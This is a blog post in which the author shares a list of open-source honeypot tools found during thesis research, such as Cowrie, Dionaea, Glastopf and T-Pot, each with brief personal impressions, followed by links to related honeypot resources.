For my thesis I researched a lot of resources regarding honeypots, including a number of open-source softwares. Before I clean up my bookmark bar and remove those references, I thought it may be interesting to others. Maybe someone out there might search for it, so why not share my findings?
Amun is a rather outdated malware honeypot which extends Nepenthes, the results of academic research from 2006. I did not use it, so I cannot comment on its functionality. You should use one of its successors, Dionaea.
Dionaea is, again, a Nepenthes successor, with an improved detection for shell code exploits. It collects malware from FTP, SMB and other protocols. If you are interested in malware and database exploit, this is the right honeypot to use.
Kippo is an SSH honeypot and widely used in academia for different purposes. The development has stalled for some time, so a successor was born: Cowrie.
Cowrie is an SSH and Telnet honeypot. This is one of the coolest honeypots I used, mainly because of its rich features. This tool simulates an SSH service with complete emulation of an interactive terminal. You can collect what a user enters into the command line and catch the user/password combinations used to login. You can also find a preconfigured Docker image if you want to try it out. I wrote about this software in a previous blog post.
sshesame is a SSH honeypot that accepts any password, any connection attempts and any request. It probably only catches automated exploitation methods, as it is very simple and does not try to emulate a terminal, like Cowrie does.
HonSSH is a “high-interaction” honeypot, which means it uses a real system to deceive an attacker. From the description, it is basically a between an attacker and a real SSH server. It allows to look into the encrypted SSH connection and therefore creates two SSH connections. I have not tried it, but it looked really promising.
Heralding is the right tool if you are only interested in credentials (e.g. usernames and plaintext passwords). I only tested it for a few minutes, but it looks promising and might be useful for specific use cases.
Glastopf collects any data related to Web services, from injections to scripting. It works pretty good with default settings, but you can tweak it a lot. It has a successor and is still maintained by the Austrian MushMush foundation.
SNARE and TANNER are two parts of one concept: Make existing website into a Web honeypot. They are the successors to Glastopf and have a lot of interesting features. Unfortunately, I was not able to try it out yet.
Artillery is “a combination of a honeypot, monitoring tool, and alerting system”. Basically, it detects intrusions and blacklists the IPs. It was not exactly relevant for my thesis, so I did not look into it that much. But it seems to work both for Linux and Windows systems, so that might be interesting for specific uses.
T-Pot is an Ubuntu server image containing a number of preconfigured honeypots, monitoring and visualization tools. If you want to monitor a number of services without any configuration, it is the right tool. Really cool software and makes extensive use of Docker containers.
If you use Python and the Django web framework, you might find django-admin-honeypot interesting. It simulates the admin interface built into Django and monitors accesses and actions associated to it.
HoneyD operates on a lower level than most other honeypots. It creates virtual hosts on a network that can be configured to resemble real operating systems. Thus, if you scan a network, you might get a number of systems that might not actually exist and are only simulated systems. Pretty cool, unfortunately I had no use for it yet.
Honeybits is a tool to create “breadcrumbs” and lure an attacker to a honeypot. It automatically creates traces on a system leading to a honeypot system, such that an attacker that breaches a system might “find” the honeypot and interact with it.
With p0f v3, there is a rather powerful fingerprinting tool which works on the network level. It collects several logs and creates fingerprints to identify connecting IPs. It also adds a ton of interesting information, such as OS version, link information and more.
Here are some other resources that I found useful during my research:
- Honeypot software list for Blackarch, a Penetration Testing distribution based on Arch.
- The Honeynet project, a project collecting various tools developed over time. Founded in 1999, it has a lot of outdated and dead links, but some resources are still accessible and interesting to read.
- HoneyDB, a community-driven honeypot sensor data collection